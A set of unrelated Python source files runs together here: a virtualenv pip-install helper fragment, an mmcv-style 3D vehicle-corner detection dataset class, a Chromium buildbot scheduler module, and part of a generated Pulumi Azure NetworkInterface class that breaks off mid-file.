"{red}Error installing into virtualenv:{clear}\n"
"stdout: %sstderr: %s\nReturn code %s\n", stdout, stderr,
proc.returncode
)
raise BuckitException(
"Could not install virtualenv at {}",
python_settings.virtualenv_root)
stdout = stdout.decode('utf-8')
return self.parse_pip_output(python_settings, stdout)
def setup_install_prefix(self, python_settings, destination):
platform_install_prefix = os.path.join(
destination, python_settings.prefix_subdir
)
if not os.path.exists(destination):
os.makedirs(destination)
if not os.path.exists(platform_install_prefix):
# TODO: Windows
relative_install_prefix = os.path.relpath(
os.path.realpath(
python_settings.virtualenv_root,
),
os.path.realpath(os.path.split(platform_install_prefix)[0]),
)
logging.debug(
"%s does not exist. Linking it to %s via %s",
platform_install_prefix, python_settings.virtualenv_root,
relative_install_prefix
)
os.symlink(
relative_install_prefix,
platform_install_prefix,
)
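# Minimal, self-contained sketch (illustrative paths only) of the venv-relative
# remapping that transform_pip_output() performs: a file reported by pip under
# the virtualenv's site-packages is keyed by its path relative to the venv root
# and mapped back to its importable module path.
def _example_venv_relative_remap():
    virtualenv_root = "/tmp/example-venv"
    location = "/tmp/example-venv/lib/python3.6/site-packages"
    found_files = ["foo/__init__.py", "foo/bar.py"]
    srcs = {}
    for path in found_files:
        full_path = os.path.normpath(os.path.join(location, path))
        if full_path.startswith(virtualenv_root + os.sep):
            venv_relative = full_path[len(virtualenv_root) + len(os.sep):]
        else:
            venv_relative = path
        srcs[venv_relative] = path
    # srcs == {"lib/python3.6/site-packages/foo/__init__.py": "foo/__init__.py",
    #          "lib/python3.6/site-packages/foo/bar.py": "foo/bar.py"}
    return srcs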
|
import os.path as osp
import mmcv
import numpy as np
from mmcv.parallel import DataContainer as DC
from torch.utils.data import Dataset
from .registry import DATASETS
from .transforms import (ImageTransform, PointTransform, Numpy2Tensor)
from .utils import to_tensor, random_scale
from .extra_aug import ExtraAugmentation
@DATASETS.register_module
class Vision3DDataset(Dataset):
"""Custom dataset for detection.
Annotation format:
[
{
'filename': 'a.jpg',
'url': 'http://dataplatform.fabu.ai/xxxx',
'width': 1920,
'height': 1200,
'ann': {
'corners': <np.ndarray> (n, 6, 2),
'classes': <np.ndarray> (n),
'poses': <np.ndarray> (n),
'corners_ignore': <np.ndarray> (n, 6, 2),
'bboxes': <np.ndarray> (n,4),
}
},
...
]
The `ann` field is optional for testing.
"""
CLASSES = [
'__background__', 'car', 'bus', 'truck', 'person', 'bicycle',
'tricycle', 'block'
]
def __init__(self,
ann_file,
img_prefix,
img_scale,
img_norm_cfg,
multiscale_mode='value',
size_divisor=None,
flip_ratio=0,
with_ignore=False,
extra_aug=None,
resize_keep_ratio=True,
sample_file=None,
num_classes=8,
test_mode=False):
super(Vision3DDataset, self).__init__()
# prefix of images path
self.img_prefix = img_prefix
self.name = osp.basename(ann_file).split('.')[0]
# load annotations (and proposals)
self.raw_annotations = self.load_annotations(ann_file)
# support dict or list
if isinstance(self.raw_annotations, list):
self.ids = range(len(self.raw_annotations))
elif isinstance(self.raw_annotations, dict):
if sample_file is not None and osp.isfile(sample_file):
self.ids = mmcv.load(sample_file, encoding='latin1')
else:
self.ids = sorted(list(self.raw_annotations.keys()))
else:
raise Exception("Unrecognized type of annotations: {}".format(
type(self.raw_annotations)))
# filter images with no annotation during training
if not test_mode:
self._filter_imgs()
# (long_edge, short_edge) or [(long1, short1), (long2, short2), ...]
self.img_scales = img_scale if isinstance(img_scale,
list) else [img_scale]
assert mmcv.is_list_of(self.img_scales, tuple)
# normalization configs
self.img_norm_cfg = img_norm_cfg
# multi-scale mode (only applicable for multi-scale training)
self.multiscale_mode = multiscale_mode
assert multiscale_mode in ['value', 'range']
# flip ratio
self.flip_ratio = flip_ratio
assert flip_ratio >= 0 and flip_ratio <= 1
# padding border to ensure the image size can be divided by
# size_divisor (used for FPN)
self.size_divisor = size_divisor
# some datasets provide bbox annotations as ignore/crowd/difficult,
self.with_ignore = with_ignore
# in test mode or not
self.test_mode = test_mode
# set group flag for the sampler
if not self.test_mode:
self._set_group_flag()
# transforms
self.img_transform = ImageTransform(
size_divisor=self.size_divisor, **self.img_norm_cfg)
self.point_transform = PointTransform()
self.numpy2tensor = Numpy2Tensor()
# if use extra augmentation
if extra_aug is not None:
self.extra_aug = ExtraAugmentation(**extra_aug)
else:
self.extra_aug = None
# image rescale if keep ratio
self.resize_keep_ratio = resize_keep_ratio
self.num_classes = num_classes
def __len__(self):
return len(self.ids)
def load_annotations(self, ann_file):
return mmcv.load(ann_file, encoding='latin1')
def get_ann_info(self, idx):
key = self.ids[idx]
return self.raw_annotations[key]['ann']
def get_img_info(self, idx):
key = self.ids[idx]
return self.raw_annotations[key]
    def _filter_imgs(self, min_size=32):
        """Filter out images that are too small."""
valid_inds = []
for idx in self.ids:
img_info = self.raw_annotations[idx]
if min(img_info['width'], img_info['height']) >= min_size:
valid_inds.append(idx)
self.ids = valid_inds
def _set_group_flag(self):
"""Set flag according to image aspect ratio.
Images with aspect ratio greater than 1 will be set as group 1,
otherwise group 0.
"""
self.flag = np.zeros(len(self), dtype=np.uint8)
for i in range(len(self)):
img_info = self.get_img_info(i)
if img_info['width'] / img_info['height'] > 1:
self.flag[i] = 1
def _rand_another(self, idx):
pool = np.where(self.flag == self.flag[idx])[0]
return np.random.choice(pool)
def __getitem__(self, idx):
if self.test_mode:
return self.prepare_test_img(idx)
while True:
data = self.prepare_train_img(idx)
if data is None:
idx = self._rand_another(idx)
continue
return data
def prepare_train_img(self, idx):
img_info = self.get_img_info(idx)
# load image
img = mmcv.imread(osp.join(self.img_prefix, img_info['filename']))
ann = self.get_ann_info(idx)
gt_corners = ann['corners']
gt_classes = ann['classes']
gt_poses = ann['poses']
        # instances whose class id is negative are encoded as ignored
        if not self.with_ignore:
            keep = np.where(gt_classes > 0)[0]
            gt_corners = gt_corners[keep]
            gt_classes = gt_classes[keep]
            gt_poses = gt_poses[keep]
if len(gt_corners) == 0:
return None
## ensure the corner order.
## bi-sideview:
## c0 -- c1 -- c2
## | | |
## c3 -- c4 -- c5
## single-sideview
## c0 -- - -- c2
## | | |
## c3 -- - -- c5
        try:
            assert (gt_corners[:, 0, 0] < gt_corners[:, 2, 0]).all()
        except AssertionError:
            # log the offending corner array shape to help track down bad annotations
            print(gt_corners.shape)
assert (gt_corners[:, 0, 1] < gt_corners[:, 3, 1]).all()
assert (gt_corners[:, 5, 0] > gt_corners[:, 3, 0]).all()
assert (gt_corners[:, 5, 1] > gt_corners[:, 2, 1]).all()
# extra augmentation
if self.extra_aug is not None:
labels = np.stack([gt_classes, gt_poses], axis=1)
img, gt_corners, labels = self.extra_aug(img, gt_corners, labels)
gt_classes, gt_poses = np.split(labels, 2, axis=1)
gt_classes = gt_classes.reshape(-1)
gt_poses = gt_poses.reshape(-1)
# apply transforms
flip = True if np.random.rand() < self.flip_ratio else False
# randomly sample a scale
img_scale = random_scale(self.img_scales, self.multiscale_mode)
img, img_shape, pad_shape, scale_factor = self.img_transform(
img, img_scale, flip, keep_ratio=self.resize_keep_ratio)
img = img.copy()
gt_corners, gt_poses = self.point_transform(gt_corners, gt_poses,
img_shape,
scale_factor[:2], flip)
ori_shape = (img_info['height'], img_info['width'], 3)
# vimg = img * np.array(
# self.img_norm_cfg['mean'],
# dtype=np.float32).reshape(3, 1, 1) + np.array(
# self.img_norm_cfg['std'], dtype=np.float32).reshape(3, 1, 1)
# show_train_img(vimg.astype(np.uint8), gt_corners, gt_poses)
img_meta = dict(
ori_shape=ori_shape,
img_shape=img_shape,
pad_shape=pad_shape,
scale_factor=scale_factor,
flip=flip)
data = dict(
img=DC(to_tensor(img), stack=True),
img_meta=DC(img_meta, cpu_only=True),
gt_corners=DC(to_tensor(gt_corners)),
gt_classes=DC(to_tensor(gt_classes)),
gt_poses=DC(to_tensor(gt_poses)),
)
return data
def prepare_test_img(self, idx):
"""Prepare an image for testing (multi-scale and flipping)"""
img_info = self.get_img_info(idx)
img = mmcv.imread(osp.join(self.img_prefix, img_info['filename']))
def prepare_single(img, scale, flip):
_img, img_shape, pad_shape, scale_factor = self.img_transform(
img, scale, flip, keep_ratio=self.resize_keep_ratio)
_img = to_tensor(_img)
_img_meta = dict(
ori_shape=(img_info['height'], img_info['width'], 3),
img_shape=img_shape,
pad_shape=pad_shape,
scale_factor=scale_factor,
flip=flip)
return _img, _img_meta
imgs = []
img_metas = []
for scale in self.img_scales:
_img, _img_meta = prepare_single(img, scale, False)
imgs.append(_img)
img_metas.append(DC(_img_meta, cpu_only=True))
if self.flip_ratio > 0:
_img, _img_meta = prepare_single(img, scale, True)
imgs.append(_img)
img_metas.append(DC(_img_meta, cpu_only=True))
data = dict(img=imgs, img_meta=img_metas)
return data
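# Illustrative helper (a standalone sketch, not used by the dataset class):
# checks the corner-ordering convention documented in prepare_train_img for an
# (n, 6, 2) corner array laid out as
#   c0 -- c1 -- c2
#   |     |     |
#   c3 -- c4 -- c5
def _corners_follow_convention(corners):
    return bool((corners[:, 0, 0] < corners[:, 2, 0]).all()
                and (corners[:, 0, 1] < corners[:, 3, 1]).all()
                and (corners[:, 5, 0] > corners[:, 3, 0]).all()
                and (corners[:, 5, 1] > corners[:, 2, 1]).all())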
def show_train_img(img, gt_corners, gt_poses):
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
pose2sides = {
0: [('tail', 'outer')],
1: [('left', 'left'), ('tail', 'right')],
2: [('left', 'outer')],
3: [('head', 'left'), ('left', 'right')],
4: [('head', 'outer')],
5: [('right', 'left'), ('head', 'right')],
6: [('right', 'outer')],
7: [('tail', 'left'), ('right', 'right')],
}
side2color = {
'left': 'yellow',
'head': 'red',
'right': 'gold',
'tail': 'green',
}
side2idx = {
'left': [0, 1, 4, 3],
'right': [1, 2, 5, 4],
'outer': [0, 2, 5, 3],
}
plt.figure(figsize=(30, 48))
ax = plt.gca()
for i in range(len(gt_poses)):
if gt_poses[i] < 0:
side_list = [('tail', 'outer')]
else:
side_list = pose2sides[gt_poses[i]]
for s, v in side_list:
color = side2color[s]
vcorners = gt_corners[i, side2idx[v], :]
ax.add_patch((Polygon(vcorners, alpha=0.5, facecolor=color)))
if img.shape[2] == 3:
plt.imshow(img[..., [2, 1, 0]])
else:
plt.imshow(img.transpose([1, 2, 0]))
plt.show()
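# Example configuration (illustrative; the paths and normalization values below
# are placeholders, not real project settings):
#
#   dataset = Vision3DDataset(
#       ann_file='annotations/train.pkl',
#       img_prefix='images/',
#       img_scale=(1920, 1200),
#       img_norm_cfg=dict(mean=[123.675, 116.28, 103.53],
#                         std=[58.395, 57.12, 57.375], to_rgb=True),
#       flip_ratio=0.5)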
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import re
from buildbot.changes.filter import ChangeFilter
from buildbot.changes.gitpoller import GitPoller
from buildbot.process.properties import Properties
from buildbot.schedulers.basic import SingleBranchScheduler, AnyBranchScheduler
from twisted.internet import defer, utils
from twisted.python import log
class FilterNewSpecProvider(object):
"""Class that implements ChangeFilter generation for CrOS instruction commits.
CrOS sends builder triggers to BuildBot by committing changes with a specific
commit message format. Builders that want to trigger on that message will
use the ChangeFilter returned by this class in their Schedulers.
"""
# Regex to identify and parse branch-launching commit messages. The first
# group is the launching builder name, and the second is its branch.
_CHANGE_FILTER_RE = re.compile(r'Automatic:\s+Start\s+([^\s]+)\s+([^\s]+)')
# Regular expression type.
_REGEX_TYPE = type(re.compile(''))
def __init__(self, repo, builder, branch=None):
"""Creates a new FilterNewSpecProvider.
Args:
repo: The repository to watch.
builder (str/regex): The name of the cbuildbot config to watch.
branch (str/regex): The branch that the specified builder is building on.
If None, use 'master'.
"""
self._repo = repo
self._builder = self._ToRegex(builder)
self._branch = self._ToRegex(branch or 'master')
@classmethod
def _ToRegex(cls, value):
"""Converts 'value' to a regex if it's a string; else returns 'value'."""
if isinstance(value, basestring):
value = re.compile(r'^\b%s\b$' % (value,))
assert isinstance(value, cls._REGEX_TYPE)
return value
def _CheckCommitLines(self, *lines):
"""Checks if a given set of commit message lines matches the filter spec."""
for line in lines:
match = self._CHANGE_FILTER_RE.match(line)
if match:
matchBuilder, matchBranch = match.group(1), match.group(2)
break
else:
return False
# Do our builder and branch regex match?
return (
self._builder.match(matchBuilder) is not None and
self._branch.match(matchBranch) is not None)
def GetChangeFilter(self):
"""Returns (ChangeFilter): A BuildBot ChangeFilter for matching changes."""
return ChangeFilter(
lambda change: self._CheckCommitLines(*change.comments.splitlines()),
repository=self._repo)
# Function that returns a ChangeFilter from a FilterNewSpecProvider.
FilterNewSpec = lambda *args, **kwargs: \
FilterNewSpecProvider(*args, **kwargs).GetChangeFilter()
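# Self-contained sketch (not wired into any master config) showing how the
# commit-message regex above matches a branch-launch message; the builder and
# branch names are made up for illustration.
def _ExampleFilterNewSpecMatch():
  provider = FilterNewSpecProvider(
      'https://example.com/manifest-versions.git', 'x86-generic-paladin')
  # True: the line has the "Automatic: Start <builder> <branch>" form and both
  # the builder and branch regexes match.
  return provider._CheckCommitLines(
      'Automatic: Start x86-generic-paladin master')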
class _AddBuildIdMixin(object):
"""MixIn that adds 'the _addBuildIdProperty' function to a class."""
BUILD_ID_RE = re.compile(r'CrOS-Build-Id: (.+)')
@staticmethod
def _cleanMasterBuildId(value):
try:
return int(value.strip())
    except ValueError as e:
log.msg("Identified invalid build ID [%s]: %s" % (value, e))
return None
@classmethod
def _getMasterBuildId(cls, change):
for line in change.get('comments', '').splitlines():
match = cls.BUILD_ID_RE.match(line)
if match:
return cls._cleanMasterBuildId(match.group(1))
return None
@defer.inlineCallbacks
def _addBuildIdProperty(self, changeids, properties=None):
"""Adds the 'master_build_id' property if specified in the change log."""
if not properties:
properties = Properties()
if len(changeids) == 1:
change = yield self.master.db.changes.getChange(changeids[0])
master_build_id = self._getMasterBuildId(change)
if master_build_id:
properties.setProperty('master_build_id', master_build_id,
'Scheduler')
defer.returnValue(properties)
class ChromeOSManifestSingleBranchScheduler(SingleBranchScheduler,
_AddBuildIdMixin):
"""Augmented 'SingleBranchScheduler' that recognizes CROS build properties"""
# Overrides 'SingleBranchScheduler.addBuildsetForChanges'
@defer.inlineCallbacks
def addBuildsetForChanges(self, *args, **kwargs):
kwargs['properties'] = yield self._addBuildIdProperty(
kwargs.get('changeids', ()),
kwargs.get('properties'),
)
rv = yield SingleBranchScheduler.addBuildsetForChanges(
self,
*args,
**kwargs)
defer.returnValue(rv)
class ChromeOSManifestAnyBranchScheduler(AnyBranchScheduler, _AddBuildIdMixin):
"""Augmented 'AnyBranchScheduler' that recognizes CROS build properties"""
# Overrides 'AnyBranchScheduler.addBuildsetForChanges'
@defer.inlineCallbacks
def addBuildsetForChanges(self, *args, **kwargs):
kwargs['properties'] = yield self._addBuildIdProperty(
kwargs.get('changeids', ()),
kwargs.get('properties'),
)
rv = yield AnyBranchScheduler.addBuildsetForChanges(
self,
*args,
**kwargs)
defer.returnValue(rv)
class CommentRespectingGitPoller(GitPoller):
"""A subclass of the BuildBot GitPoller that doesn't wreck comment newlines.
"""
# Overrides 'buildbot.changes.gitpoller._get_commit_comments'
def _get_commit_comments(self, rev):
args = ['log', rev, '--no-walk', r'--format=%B%n']
d = utils.getProcessOutput(self.gitbin, args, path=self.workdir,
env=os.environ, errortoo=False)
def process(git_output):
stripped_output = git_output.strip().decode(self.encoding)
if len(stripped_output) == 0:
raise EnvironmentError('could not get commit comment for rev')
return stripped_output
d.addCallback(process)
return d
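# Sketch of the 'CrOS-Build-Id' extraction performed by _AddBuildIdMixin; the
# commit text below is made up and only needs a "CrOS-Build-Id: <id>" line.
def _ExampleMasterBuildIdExtraction():
  change = {'comments': 'Fake commit subject\n\nCrOS-Build-Id: 12345\n'}
  # Returns 12345; a non-integer id would be logged and mapped to None.
  return _AddBuildIdMixin._getMasterBuildId(change)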
|
<reponame>henriktao/pulumi-azure
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['NetworkInterfaceArgs', 'NetworkInterface']
@pulumi.input_type
class NetworkInterfaceArgs:
def __init__(__self__, *,
ip_configurations: pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]],
resource_group_name: pulumi.Input[str],
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_accelerated_networking: Optional[pulumi.Input[bool]] = None,
enable_ip_forwarding: Optional[pulumi.Input[bool]] = None,
internal_dns_name_label: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a NetworkInterface resource.
:param pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]] ip_configurations: One or more `ip_configuration` blocks as defined below.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
:param pulumi.Input[bool] enable_accelerated_networking: Should Accelerated Networking be enabled? Defaults to `false`.
:param pulumi.Input[bool] enable_ip_forwarding: Should IP Forwarding be enabled? Defaults to `false`.
:param pulumi.Input[str] internal_dns_name_label: The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
:param pulumi.Input[str] location: The location where the Network Interface should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "ip_configurations", ip_configurations)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if dns_servers is not None:
pulumi.set(__self__, "dns_servers", dns_servers)
if enable_accelerated_networking is not None:
pulumi.set(__self__, "enable_accelerated_networking", enable_accelerated_networking)
if enable_ip_forwarding is not None:
pulumi.set(__self__, "enable_ip_forwarding", enable_ip_forwarding)
if internal_dns_name_label is not None:
pulumi.set(__self__, "internal_dns_name_label", internal_dns_name_label)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]]:
"""
One or more `ip_configuration` blocks as defined below.
"""
return pulumi.get(self, "ip_configurations")
@ip_configurations.setter
def ip_configurations(self, value: pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]]):
pulumi.set(self, "ip_configurations", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="dnsServers")
def dns_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
"""
return pulumi.get(self, "dns_servers")
@dns_servers.setter
def dns_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dns_servers", value)
@property
@pulumi.getter(name="enableAcceleratedNetworking")
def enable_accelerated_networking(self) -> Optional[pulumi.Input[bool]]:
"""
Should Accelerated Networking be enabled? Defaults to `false`.
"""
return pulumi.get(self, "enable_accelerated_networking")
@enable_accelerated_networking.setter
def enable_accelerated_networking(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_accelerated_networking", value)
@property
@pulumi.getter(name="enableIpForwarding")
def enable_ip_forwarding(self) -> Optional[pulumi.Input[bool]]:
"""
Should IP Forwarding be enabled? Defaults to `false`.
"""
return pulumi.get(self, "enable_ip_forwarding")
@enable_ip_forwarding.setter
def enable_ip_forwarding(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_ip_forwarding", value)
@property
@pulumi.getter(name="internalDnsNameLabel")
def internal_dns_name_label(self) -> Optional[pulumi.Input[str]]:
"""
The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
"""
return pulumi.get(self, "internal_dns_name_label")
@internal_dns_name_label.setter
def internal_dns_name_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_dns_name_label", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location where the Network Interface should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Network Interface. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _NetworkInterfaceState:
def __init__(__self__, *,
applied_dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_accelerated_networking: Optional[pulumi.Input[bool]] = None,
enable_ip_forwarding: Optional[pulumi.Input[bool]] = None,
internal_dns_name_label: Optional[pulumi.Input[str]] = None,
internal_domain_name_suffix: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]]] = None,
location: Optional[pulumi.Input[str]] = None,
mac_address: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
private_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_machine_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering NetworkInterface resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] applied_dns_servers: If the Virtual Machine using this Network Interface is part of an Availability Set, then this list will have the union of all DNS servers from all Network Interfaces that are part of the Availability Set.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
:param pulumi.Input[bool] enable_accelerated_networking: Should Accelerated Networking be enabled? Defaults to `false`.
:param pulumi.Input[bool] enable_ip_forwarding: Should IP Forwarding be enabled? Defaults to `false`.
:param pulumi.Input[str] internal_dns_name_label: The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
:param pulumi.Input[str] internal_domain_name_suffix: Even if `internal_dns_name_label` is not specified, a DNS entry is created for the primary NIC of the VM. This DNS name can be constructed by concatenating the VM name with the value of `internal_domain_name_suffix`.
:param pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]] ip_configurations: One or more `ip_configuration` blocks as defined below.
:param pulumi.Input[str] location: The location where the Network Interface should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] mac_address: The Media Access Control (MAC) Address of the Network Interface.
:param pulumi.Input[str] name: The name of the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[str] private_ip_address: The Static IP Address which should be used.
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_ip_addresses: The private IP addresses of the network interface.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] virtual_machine_id: The ID of the Virtual Machine which this Network Interface is connected to.
"""
if applied_dns_servers is not None:
pulumi.set(__self__, "applied_dns_servers", applied_dns_servers)
if dns_servers is not None:
pulumi.set(__self__, "dns_servers", dns_servers)
if enable_accelerated_networking is not None:
pulumi.set(__self__, "enable_accelerated_networking", enable_accelerated_networking)
if enable_ip_forwarding is not None:
pulumi.set(__self__, "enable_ip_forwarding", enable_ip_forwarding)
if internal_dns_name_label is not None:
pulumi.set(__self__, "internal_dns_name_label", internal_dns_name_label)
if internal_domain_name_suffix is not None:
pulumi.set(__self__, "internal_domain_name_suffix", internal_domain_name_suffix)
if ip_configurations is not None:
pulumi.set(__self__, "ip_configurations", ip_configurations)
if location is not None:
pulumi.set(__self__, "location", location)
if mac_address is not None:
pulumi.set(__self__, "mac_address", mac_address)
if name is not None:
pulumi.set(__self__, "name", name)
if private_ip_address is not None:
pulumi.set(__self__, "private_ip_address", private_ip_address)
if private_ip_addresses is not None:
pulumi.set(__self__, "private_ip_addresses", private_ip_addresses)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if virtual_machine_id is not None:
pulumi.set(__self__, "virtual_machine_id", virtual_machine_id)
@property
@pulumi.getter(name="appliedDnsServers")
def applied_dns_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
If the Virtual Machine using this Network Interface is part of an Availability Set, then this list will have the union of all DNS servers from all Network Interfaces that are part of the Availability Set.
"""
return pulumi.get(self, "applied_dns_servers")
@applied_dns_servers.setter
def applied_dns_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "applied_dns_servers", value)
@property
@pulumi.getter(name="dnsServers")
def dns_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
"""
return pulumi.get(self, "dns_servers")
@dns_servers.setter
def dns_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dns_servers", value)
@property
@pulumi.getter(name="enableAcceleratedNetworking")
def enable_accelerated_networking(self) -> Optional[pulumi.Input[bool]]:
"""
Should Accelerated Networking be enabled? Defaults to `false`.
"""
return pulumi.get(self, "enable_accelerated_networking")
@enable_accelerated_networking.setter
def enable_accelerated_networking(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_accelerated_networking", value)
@property
@pulumi.getter(name="enableIpForwarding")
def enable_ip_forwarding(self) -> Optional[pulumi.Input[bool]]:
"""
Should IP Forwarding be enabled? Defaults to `false`.
"""
return pulumi.get(self, "enable_ip_forwarding")
@enable_ip_forwarding.setter
def enable_ip_forwarding(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_ip_forwarding", value)
@property
@pulumi.getter(name="internalDnsNameLabel")
def internal_dns_name_label(self) -> Optional[pulumi.Input[str]]:
"""
The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
"""
return pulumi.get(self, "internal_dns_name_label")
@internal_dns_name_label.setter
def internal_dns_name_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_dns_name_label", value)
@property
@pulumi.getter(name="internalDomainNameSuffix")
def internal_domain_name_suffix(self) -> Optional[pulumi.Input[str]]:
"""
Even if `internal_dns_name_label` is not specified, a DNS entry is created for the primary NIC of the VM. This DNS name can be constructed by concatenating the VM name with the value of `internal_domain_name_suffix`.
"""
return pulumi.get(self, "internal_domain_name_suffix")
@internal_domain_name_suffix.setter
def internal_domain_name_suffix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_domain_name_suffix", value)
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]]]:
"""
One or more `ip_configuration` blocks as defined below.
"""
return pulumi.get(self, "ip_configurations")
@ip_configurations.setter
def ip_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceIpConfigurationArgs']]]]):
pulumi.set(self, "ip_configurations", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location where the Network Interface should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="macAddress")
def mac_address(self) -> Optional[pulumi.Input[str]]:
"""
The Media Access Control (MAC) Address of the Network Interface.
"""
return pulumi.get(self, "mac_address")
@mac_address.setter
def mac_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mac_address", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Network Interface. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The Static IP Address which should be used.
"""
return pulumi.get(self, "private_ip_address")
@private_ip_address.setter
def private_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_address", value)
@property
@pulumi.getter(name="privateIpAddresses")
def private_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The private IP addresses of the network interface.
"""
return pulumi.get(self, "private_ip_addresses")
@private_ip_addresses.setter
